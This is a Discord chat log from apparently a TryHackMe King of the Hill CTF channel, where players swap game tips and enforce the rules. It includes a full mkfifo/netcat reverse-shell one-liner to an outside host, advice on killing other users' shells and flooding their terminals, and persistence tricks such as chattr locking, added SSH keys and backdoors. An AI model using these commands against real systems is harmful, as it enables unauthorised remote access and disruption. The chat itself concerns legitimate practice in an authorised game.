#koth
1 messages Β· Page 64 of 1
create account and upload an image
go ahead but i wasn't talking about that
click on the image you uploaded and take a look to the url
oh mbmb
this seems kinda hartd
im running some scans and enumeration stuff still
wait
the url when you upload the image
isnt that just your local directories
damn
the directory name is your name
you canc hange your name
oh hmmmmmmmmmm
go to /profiles
if you have an account
there you can change your name
but use burp
1 sec
wait what
I went to the profiles directory
its not there-
nothings there*
have you created an account?
hmm
hmm thats wird
i have rce
what was it
i was getting logged out everytime
i mean this was all web tho
i will dm to you
true but for KOTH there are multiple ways right?
okok
@fair adder no spoilers please? π
sorry
Sudo apt-get install RTX_3090
gg Bl4ckC4t
gg
gg
you have the 8 flag, I have 1
can't you find them?
I'm lost, I don't really like windows machines
I did that, but there are many folders, it will take a while until I get used to these windowsπ€£ π€£ π€£
it is like this in every machine
ahahhaah it takes few minutes
The good thing about koth is that I always learn something new, something very useful, I love these challenges
same
Can someone tell me how to privesc on the H1: easy machine. I know it's very easy but for some reason I just can't figure it out.
Ok thx
And there are writeups available for those rooms...
Another thing I would like to suggest you a room if you haven't done yet:
Common Linux Priv Esc
I will thx
Does anyone have a hint for H1 hard?
maybe abit late but i found port 80 to be the easiest one; make sure to run your directory enumeration tool of choice on it and pay attention to what you find
most specifically what it accepts
As much as I'd like to help, we really avoid giving out spoilers for KoTH machines, it's not like there aren't write-ups available. Just can't put the spoilers here.
(Same goes for @Neophyte#9160, I get it you were trying to help, but please avoid KoTH spoilers in chat. )
@fair adder
can you be more specific?
https://tryhackme.com/games/koth/join/6985a620ccb97f0b15566096 everybody can join
20 min
yep
do u have any docs on this? because i really cant understand why it'll work if i inject php code to the body of this GET request
inject the payloads in this article in the user agent field
yeah but why php executes the HTTP_USER_AGENT
@worldly karma i would suggest you to stop spoiling the whole box?
ok.. we are only talkin about LFI but ok
i have deleted your messages. Please refrain from posting the whole commands/urls on how to exploit the box.
when i pasted the url i changed the names
research
yeh will do
LeTs PlAy! KiNg oF ThE HiLL
https://tryhackme.com/games/koth/join/3133bc34f3d04e6c9f3d9833
Random Public, Starting in 23 mins!
hey everyone! Would someone like to give me an idea on patching vulnerabilities to maintain the access......I mean I've only been exposed to attacking stuff so far.
Are there rooms where I can practice the same?
yeah got it sir! Thanks for your assistanceππ» π―
Gave +1 Rep to @stiff egret
no need of 'sir' :)
sure:) Moreover, would it make sense to participate with no prior knowledge of defense?
Yeah, why not, although it is preferred that you have some idea about how defending works, but you can go on without it as well, and learn along the way.
I'd recommend watching John Hammond's or Optional's videos on King of the hill to get some basic ideas about defending and attacking before you start tho.
Yeah sure! Great recommendations thoughπ― ππ»
For King of the Hill, IIRC alt accounts are also allowed, so you can create another account and make a game with 2 of your accounts. And practice stuff.
( @terse willow Alts are allowed right? )
that seems interestingπ
I don't think they are allowed if you're using 'em to control resets
yeah, that was an issue with them
There's also KoTH Food and Hackers available as standalones on THM for practice
got it sir!ππ»
oh, I think that was for cases in public matches, in private matches using alts should be fine I think π€
btw from which level one is considered as intermediate?
Is it not letting you play because only intermediate players are allowed?
I'm searching Food in the rooms search bar and its not finding anything, whats the name?
lol
Failing that, search NinjaJc01 and you'll find all my rooms
maybe someone can send a direct link?
Want a little practice at KoTH?
Don't want to compete with other people?
Hackers and Food are public as standalone rooms so that you can practice them alone.
https://tryhackme.com/room/kothfoodctf
https://tryhackme.com/room/kothhackers
ree
time to tag horshark 
"Problem finding room..
"
Ok now you can thank me. Link was wrong
yeah noticed that LOL
There's a link to both of them now
oh ok
Gosh, I need to improve those descriptions
One silly question since i'm new to CTF challenges. So i have the IP what to do with it i can't access it or ping it.. please let me know the step to access i will do further steps on my own.....
Not to demotivate you or anything, but if you are very new to all this, then I'd say start with easy rooms on tryhackme first, and not go head on to KoTH
bruh you can't run if you don't know how to walk
Ok will check the basic room first..thanks for the info.
https://tryhackme.com/room/tutorial
Maybe start with this
Ok
Uhhhhhh
I actually can't remember what was decided there
so my metasploit session dies instantly when i connect to it through nc and ive seen john hammond do something in one of his videos that immediately opens a meterpreter session which fixed his problem. any ideas what it was?
uh... what?
lol
ok
im having a multihandler listener running and im connecting to it from the attacker machine using nc and the session always dies
Oh oookkkk, no idea why. π You can always use regular reverse shells. π€·ββοΈ
it happened when i used regular reverse shells too
its something that happened to John hammond in one of his videos and he fixed it by doing something in metasploit
LOL
In THAT case, it usually depends on the reverse shell you used, the most stable IMO is mkfifo one,
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
again, no idea about that. π
ok ill try running that from the target machine
ATB
yay
it works
thank you!
NP
----r--r-- 1 bob bob 38 Mar 28 2020 log
although im bob, cant read the file. google'd some and i found out the there must be something to do with ACL but i checked it and its fine for bob
yeah, you can try that in your own terminal...current permissions are 044....
yeah so if im reading this right the r is in group
In group and other, yes
isnt it Nothing for user, read for group and read for public?
yeah exactly
is he? @quiet schooner might answer this well then......
wait, maybe i just forgot all of what i learned about linux file permissiobns
what is the second bob mean here
isnt it owner bob, group bob
?
Yes
he is
so bob is indeed part of the group
why i cant read π¦
cat: log: Permission denied
π
Probably because Owner is more specific so it'd take priority?
Owner is bob too
i never thought it like that
How about if you are Bob change the perms of fileπ
chmod: changing permissions of 'log': Operation not permitted
guys maybe someone did this room? Its KothFood
Yeah. But the owner cannot read.
I made the room
is that a thing?
so in order to read the file i need to be someone who is not bob?
yeah, that's what happening here #koth message
I don't remember but probably?
I don't actually remember having a user called bob. They were all food themed.
yeah but u could change the perms
i changed it
for the question
Yes he can be someone or should be in Bob's group
gotcha
yeah im talking about bread
I'll check my writeups for it
HardStoN so you added your own user named Bob?
no no, i just changed it to not spoil something for someone
That "log" file doesn't appear in my writeup
Then yeah. You'll probably want to be a different user. Or root.
ill try that
hey, although I've got shell 2 times both in case of cron jobs for privesc using these commands but still I am having a hard time to understand it after cat /tmp/f
since, I've come across mkfifo command for the first time. All I know is that it makes a named pipe which needs to be connected on 2 sides where one end should be reading and other should be writing and vice-versa. So it means there will be no output after cat /tmp/f since it's not connected on the other side.
so my question is then how does using | and the further command playing their role here?
hey, thanks for replying!ππ» I'll just go through this thread.
Gave +1 Rep to @solid patrol
i am new at koth and i have a question, is it allowed to change the ssh key for users so if anyone find the id_rsa key he could not connect to the machine
yes
whats the best way to find flags? just cd cross all directories and search or any commands like grep?
manually read every file in the system
you can use the "find" command. For example: find / -type f -name "flag*.txt" This will search the entire system for files with that name.
the "*" means its can also be something like flag7.txt
@lilac basin good fight!
Gg
thats the first time i got to root on shrek
nc π
please don't reset the machine randomly
@fair adder
guys what can i do if we are 2 in koth and the other player restart the machine every 5 minutes
you ask them to stop? :P
Hello guys, I was playing koth, and when I put my name in /root/king.txt, it returned a permission denied error, how can I leave the file like this? even for root?
study
dont restart the machine
You were stopping the ssh service .-.
When I got root on the machine, in less than 30s I was expelled from ssh, and I was unable to reconnect
enumerate
?
gg
n0n1m0us
- Try sending a screenshot, also it looks like your machine not the koth machine?
- Mention koth-staff for issues regarding koth not the THM staff.
- If you believe someone is breaking the rules, reports go to
koth@tryhackme.com
Ignore the 1st and 2nd point
I just copy pasted this msg from Naughty
ty now he stopped from restarting the machine
so if he restart it again i will report
I quit the game because I couldn't play, since the ssh service was unavailable when I tried to connect
what do you mean it was unavailable?
@fair adder
is there something wrong with koth?
i cant get to the game. and i cant leave because of that.
The ssh was being stopped and I was unable to access the machine through the ssh service
what was it saying when you tried to connect?
yes
thats not an answer to that question
Try running the nmap scan again, people tend to change the port. Moreover try reading about the chattr binary.
Also it's not against the rules but totally ruins the purpose of KoTH to spam reset just because the only way you know is patched. There are multiple ways in for foothold and to root.
I connected to ssh to explore the machine (tyler) and after a while, the connection was closed, and when I tried to reconnect, it returned this "connection refused" error
then the port was probably changed
i know that. im in but i cant use the find command. its not found for some reason
have more ways to find suid binaries
helo π£
lol. thats fair
π£
π

someone really played with this guys emotions changing the ssh port lol
a3881fbad643c2a7cb83850c
@misty jungle don't give up
don't give up doesn't mean RESET THE MACHINE @misty jungle
@lilac basin did you harden the hell outta that?
maybe
i may have found a way but i couldnt get to it before the end. lol.
i always leave vulns for the initial access. But the hardest thing is to get root
yeah
If anyone plays after about half an hour or so, ping me too :)
Gonna make a coffee so strong that'll beat redbull.
i'm here
is the new room up ? jellyfish ?
Not yet
Really not the place to ask for it tho.
there's a pin in #834378315505598464
totally forgot this was koth
lol NP
@lilac basin Hop in if you are still about :)
send the link
^^
(Let's hope it's not windows
)
same
ncie
I ruined everything for my self. I forgot the password and my shells keep breaking
is good to change password?
I think as long as its still possible to get root its ok.
but if you do you will break the access
Changing passwords is obv allowed, as it's the part of most basic patching. But a good move would be to leave some other albeit hard ways to get in the machine intact.
It's not a fight if there is no one in the ring.
Really? A reset? smh, **Please only reset the machine if it is broken!**I can only say this so many times.
@stiff egret @lilac basin @sour zealot let me know when you guys make a new game. i might hop on
Sure!
Do u guys like really talk sometimes in the voice chat here while playing koth?
sometimes
usually it's just people oohing and aahing when someone kills their shells π
Wdym killing their shells?? Like resetting the machine?
naah, killing their shells as in killing the PID of shells
helo π£
Guys does someone here work as a pentester IRL
Well thats mean lol
ps aux | grep pts see the PID of shell someone is on, then kill -9 PID
and there will be shouting on the other side of mic
π
quality content guaranteed
Indeee
?
why kill shells if you cna run nyancat on their ttys
many here, irrc.
when they don't have ttys
So my question is, do u guys like rly feel that these ctf's are like the real world
although I, too, prefer nyancat over killing shells
?
no
I'd say if you ask that question in #general , you'll get way more responses and way more reasons
Aight
although, I've seen admin:password irl scenarios. ALOT
I mean, i wasnt talking about these stuff when i said ctf's, i was talking about like medium-hard rooms
reallly depends on the rooms.
more 'puzzle style' focused
there's one machine on htb tho
easy one
which is pretty realistic
but i dont remember the name
foothold
delivery i think
An easy machine that is irl?
can someone link a write up about H1: easy. I can't figure out the privesc.
Sorry, you have to google that around, posting spoilers in this chat is not allowed. :)
I know but I can't find any write ups online. So i hoped someone could send me a link.
i cant find any writeup also
i put my name in king.txt but it doesnt work
i am root and i want to edit king.txt but their is a error "Operation not permitted" i am root why i cant change it?
how are you exiting vim?
on vim?
its not the editor i get the error with echo > king.txt
do you get any other info
no only "Operation not permitted"
room is over i hope i dont get this error next time too
I was studying about it, I think the file is locked, to unlock it, try the following:
chattr -i /root/king.txt
chmod 777 /root/king.txt
chattr and chmod are to remove or give permissions, if it doesn't work, i don't know how to help :(
XD
so to answer the question. someone who got there first probably had the file locked or opened. to unlock it you may have to boot others off first
do lsattr king.txt
if it has attribute i, that means you can't change/delete the file
if it has attribute a
that means you can only append to it when writing
not overwrite what's already in it
generally you will want to do chattr +ai king.txt after putting your name in it and moving the chattr binary to another location with another name
so if you lose root others will need to waste some time uploading their own static chattr binary to the machine
I'm not sure if chattr is the only binary you're permitted to hide from others / delete
I've played with some people who hid ps/kill/pkill/etc, pretty useful aswell (if it's permitted ofc)
who restart the machine all the time
smol pp people
anyway i don't think people often get punished for not following the koth rules
i didnt restart it it was the other two
one question when getting root and want to patch the vuln like here the ip with the suid permissions what should i do because changing permission is not allowed
but if the guy's fun is reseting the machine until he's the first one to perform the steps he has performed a million times before then what can i say 
if you ran lsattr on it you would see it has i attribute
which means immutable
so you remove it from it
ah
and then you can change the permissions
okey thank u very much
@karmic light you need to give us the join link not the spectate link
If you want us to join
@jolly briar don't remove flags
Check pins
gg @rocky cradleslowyo
anyone playing rn?
I'm up for a game if 5+ people
and no emotional resets :)
π£
how should i search flags? i only can find 4 flags from 7 at hogwarts machine π¦
Just look at every file in general directories.
grep -r "THM{" /path 2>/dev/null
flags you can use:
--exclude-dir
-I (excludes binaries)
someone for king of the hill
You are in a koth with me
And I canβt see the machine ip
So I want to know if itβs the same for you
is it still the case? or you can see the IP now?
Thanks for reporting, pinged higher admins. This is getting looked into. Probably something to do with the overall site upgrades thats been going on recently.
i got that error too but refreshing the page solved it
i even couldnt load the main page
i though it was just me. guess someone was hitting it really hard
wow i joined at the end π¦
but no one has king yet wtf
yep
how is no one king yet?
unless it's bugged for me
no one is king

try this one https://tryhackme.com/games/koth/join/7237b5be6ea456e07fdcd45b @livid anvil
i just dont know windows yet
at least the method i know 
starts in 13 mins
am gonna join you blvckmetxl
cool :))
btw how to broadcast any message?
wall "message"
Thanks
are u 'bhavesh'?
Yes
It's my first gane and idk how to defend
game*
most important is persistence
adding backdoors, etc
after that fix regular stuff
suids, change passwords...
sudoers, capabilities
am gonna try my best but if it's hoth hard or any windows i'll try to get shell first
i want h1: hard
the best koth machine
or space jam π
food
something wrong with the machine?
I guess yes
i tried 2 ways but Exit status
error
did someone patched so quickly?
i dont think so
i think we should reset
it's broken i think
root is pretty easy once you're in
and no one is root yet
oh nvm then
What's going on?
no one
@short loom did you kill the http server?
it's good
i don't think there's a http server in this machine
this machine is pretty boring ;s
you sure
it's just a matter of who gets in as ramen and changes password first xd
yea
well thats stupid
that's why i said i wanted space jam 
theres no ssh?
there is ssh
ports are changed
idk what he did to http server and 2 more ways to get in
i got in as food but i can't do anything
wdym can't do anything?
rbash?
or he messed the filesystem?
no command is found
and he changed the port once again
what command?
if he's messing up the filesystem that is agaisnt the rules
-bash: whoami: No such file or directory
ok so he messed up the filesystem :))
just report then :))
I really don't know what he actually did
like i found 3/4 ways to get in but none of them worked
i got in then i found this
i think i know who he is, he always does this stuff
just report
probably got banned on his other acc
he compresses the system binaries and delete them
or smth like that
idk honestly
good luck playing after this

It was a bad/learning experience for me
ye
that's the reason i kinda stopped playing koth
there's people who do this kind of stuff
ant there's the people who vote reset for no reason
they don't even try, they just vote reset
reset so we can get on
yeah. and he deleted everything
Okay i'll do reset
yeah this room is stupid
@lilac basin can i dm>
yep
That's intended
Okok Thanks
anyone wanna do a KOTH
Hey, how do you add your ssh pub-key to authorized_keys? Like i have tried to do it in koth games but it never work :/
yee ik
then "cat id_rsa.pub > authorized_keys"
obv you have to copy-paste or wget the id_rsa.pub file in the victim machine
yee ik, but after all that i still cant ssh in...
did you check the ssh config file?
uh, not really.
@lilac basin Nvm I just found a blog that explains how to use it and everything. Thanks for the help anyways π
Gave +1 Rep to @lilac basin
np
koth anyone?
If you have an issue regarding KoTH kindly try to ping KoTH staff instead of other staff members as they are the ones supposed to handle that. Koth staff members are:
Naughty
Mr.Holmes
myDonut
Other than that complains go to koth@tryhackme.com
(Probably better not pinging CMN for it @nova tide)
I was doubting on that one too but he had koth staff role as well so wrote his name at the end π
Yeah -- poor guy has enough on his plate just now π
who keeps reseting the machine?
i was so close... then i fucked up my shell.....
you didn't enumerate well
well i think i ran something that locked up www-data by accident. at least going through php
:
GGwp @grim narwhal
.
@wary jolt koth?
@nova tide you won't be Streaming? Koth?
Yep I am watching that
I haven't played a koth... don't wanna get stomped by you
KOTH live now on superhero1's dicsord
[15:20]
superhero1 island
[15:20]
anyone can join the game
share the link
@livid ginkgo @nova tide doubt solving session please
yeah?
you weren't able to change the password for root because of me
Why I wasn't able to change king.txt
chattr binary
it makes the file immutable
I tried to remove immutable
But someone showed up with nyancat
that would be me
in 8 min
yeah - i didnt patch anything
i was looking for flags because once youre on and have chattr thats it its hard to combat
it becomes a race condition
I also didnt want to play dirty @fair adder by kicking anyone out
The only thing I did was echo stuff to terminals
urandom ^
Sorry was my first time
its ok
thats why i didnt patch or play dirty - we were there to learn on stream π
And why was authorized_keys was not writable? Again chattr?
yup
I won't be killing shells from today
And I only kicked once ...and it was superhero randomly
xD
Thanks @fair adder !
Gave +1 Rep to @lapis linden
https://tryhackme.com/games/koth/join/250f2398c4886543d69981be starting in 20 everyone invited
starting in 5 minutes everyone invited
gg
very fun game
yeah it was
i had my chattr in /tmp
bro, i tried to find it with "FIND" command
i named it something random so i hoped you wouldn't find it
yeah I know. I deleted it a few times but forgot about it later
@lilac basin cmg for u huh π€£
?
nothing , gg
oh bruh i left the machine
and u still the winner 

lol
sorry
flags are mine lifeboat
is it okay to remove a user from sudoers file
@lilac basin
Yes

alright , i'm out thats weird
i think it's against rules
nope
i did stop from giving you nyancat
try to get king
!!!!
I already left srry
I almost had it though
btw with which command did you make us run the nyancat program?
which users were playing?
CREAT A GAME
someone for koth?
starts in 20 minutes
almost everyrthing got patched.
I'm on shifu. Trying to find privesc
how do u play king of the hill
and this can be any level rite
You need to change your profile to intermediate to play koth.
You can do it even if you are lvl 1
oh okay , does it have any side effect on me ? and i am total beginner so i feel this might help me gain more knowledge
I don't think it does have any side effects.
also be sure to read the rules before you play!
alright i will do it now , and thanks alot man this community at each point is so helpful
Gave +1 Rep to @errant marten
Good luck, and most importantly have fun π
Thanks alot
You might will need to have intermediate/advanced experience level on your profile. You can change it from your profile settings.
thanks
Gave +1 Rep to @nova tide
14 mins
π³
I like seeing how players attempt to bruteforce my ssh password.
Thanks, LOL I've been looking for this guide @errant marten
Gave +1 Rep to @errant marten
@sour zealot which user did you get access from
rcampbell
I hope you haven't changed your password π
I didn't
anyone got some small tips for the H1: medium machine. I can't seem to figure it out.
Were the hell is the king.txt in hogwarts?
is this normal?
nevermind I made the king.txt file myself and it works.
lol
Either someone intentionally removed it, or the machine is a little broken.
yes.
Intended, you need to make a king file on your own. just like echoing your name in king.txt will make the file π€·ββοΈ
i've seen people get nyancat'd in koth games, how do you actually do that?
the way i've done it just find your victims device file in /dev/pts and then just run nyancat and redirect output to the device file
you can use the w command to find the proper device files
wait so like
./nyancat > echo "victm pid"?
not the PID, the actual device file, typically just a number like /dev/pts/3
and the echo there would break the command
test it out locally with a test account, its easy
while true; do clear > /dev/pts/x; sleep 3; done
oooh ok, thanks
i kinda wanna practice more koth but it's kinda hard lol, so thanks for the tip
is this fair?
cant you ban yourself with this?
no rules in koth π€ͺ
well, firewall stuff ig
but basically none
ok ok ok so its fair nice
dont kill shells doe
but if instead a x i use a *
it'll do your own
im not gonna blow myself?
people play dirty af
I mean, we'd all rather people didn't play like that
but it is what it is I guess π€·ββοΈ
jumm ok
that's one way of putting it
lol ok nice xD
try ssh
ssh it's almost everytime the best way to get in
There's a quote a lot of rules. Please read in the homepage before you end up breaking some.
That being said, I k you mercury (xD and I k you know the rules)
Just everyone please, it's always better to know the limits than to test them and find the hard way
Rules on the bottom of the page
starts in 15 minutes
is it okay to delete all flags and change servcies passwords?! π
cuz i notice that someone already did this
No it's not allowed to change or delete any flags or make them inaccessible. On the other hand it is allowed to change some password but there has to always be a different method to get on the box/root.
Read rule 2
Yeah.
Where does that say you need to leave a vuln in?
There's nothing that says you need to leave at least one vuln.
https://tryhackme.com/games/koth/join/c8bbf854b206817a4e75f56f go play KoTH guys?
if you leave a vuln, a hard one, the game becomes more competitive
Time to get that rank back!
ATB @lilac basin
uh np
Interesting, did you patch the priv-esc?
Mhm, Nice, I am not able to priv-esc for some reason. Trying different methods now
i can see you in 2 container, in which one are you trying to do privesc
both π
ahahaha ok
in one of them im sure you can do privesc
dont try "/bin/bash -p"
this isnt the right way
at this point I have dropped the idea to get root shell, I am just trying to get my code on the machine.
what code
naah man, I found a way, but it'll take time. on the better side, this is a reallllllllly interesting way for this machine
yeah
different from the hint i gave before
yeah, it's very very diff
oh
No, it was a public match :)
i was asking cuz before the game started someone joined and then left and slso the machine was the hardest one
Oh, I wasn't on system when the game started. I was bummed with this machine too, but from what I just learned in last 30 minutes, I damn love this machine.
Can't play for a while, will join back in about 30 minutes/1 hour. Gotta rest a bit :) GG
okok
Aint a rule tho
nope
7 minutes to go
Public match.
how to use a reverse shell in space jam
Someone patched out the reverse shell I was gonna use, but I snatched a flag
ggs
i quit, because i tried fuc.... 4 diferent reverse shells
same, i'm guessing someone patched up the perms
You cannot change perms on the flag.
no
free ram?
2 in if anyone's interested
hi everyone. Can i play 2 player king of the hill mode? How i start game?
What do you mean 2 player?
2 person
I found 3 flags on production and got king, which is nice
i changed the root.txt flag by mistake
how can i report the accident?
i wanted to change king.txt and changed root.txt hahaha
That's okay if that's by mistake...just inform those who are playing with you
And reset the machine
how should i inform them writing dms is not allowed
Why remove chattr right after one use when you downloaded it ?
It will decrease the speed of code.
@fair adder
ye i will change that later, i used to do that for some reason
also may i dm you? i have a question
Sure, though I am on phone, my replies are limited.
np it's a yes/no answer type of question
Sure
If you want others to join, please share the invite link and not the spectator link.
Any one up for KOTH gonna create one if so
if any one is intrested
Is there a chattr for windows? or
You should literally Google that line.
I did
It is just, how to use it and stuff
I googled it multiple times
ITs most important part is learning the best way to express what you are searching for on internet, i think
anyone wanna play ? https://tryhackme.com/games/koth/join/2a1f462d08a08a6ea842593f
isnt it cute when people get mad and start scanning your machine?
10.10.20.168 - - [15/May/2021 19:08:33] code 501, message Unsupported method ('OPTIONS') 10.10.20.168 - - [15/May/2021 19:08:33] "OPTIONS / HTTP/1.1" 501 -
i love it
10.6.73.140 is his thm ip btw
Reee
KEK
@fair adder email this to the koth email and Iβll forward it to Skidy
ok thx
Gave +1 Rep to @short tusk
done
Aye yeah let us know and we'll get this awful behaviour resolved
Random public match, starting in 23 minutes
hey @stiff egret can u check dm please? :))
Just saw them, must've missed them
https://tryhackme.com/games/koth/join/797cec7084ce329d78b4e3ad
Hop in, 2 minutes remaining
3 remaining slots
srry i have to update apt rq
ye
yeah
i need to find 4 more flags
3*
f
whaaaa
you can mess with me but you cant beat me
idk maybe that was me by accident
maybe i chose too hard of a room for even me a bit srry
welp srry we can try a easier room like shrek if you want to sometime
of course
do you mind atleast sharing how you got machine access in dms after game?
curious
sure
thx
hey btw @latent osprey when we're done can you show me your loop your using
Yeah sure
its noice lol i was trying to make one in /tmp/loop.sh but it failed miserably
Yep I saw that rn
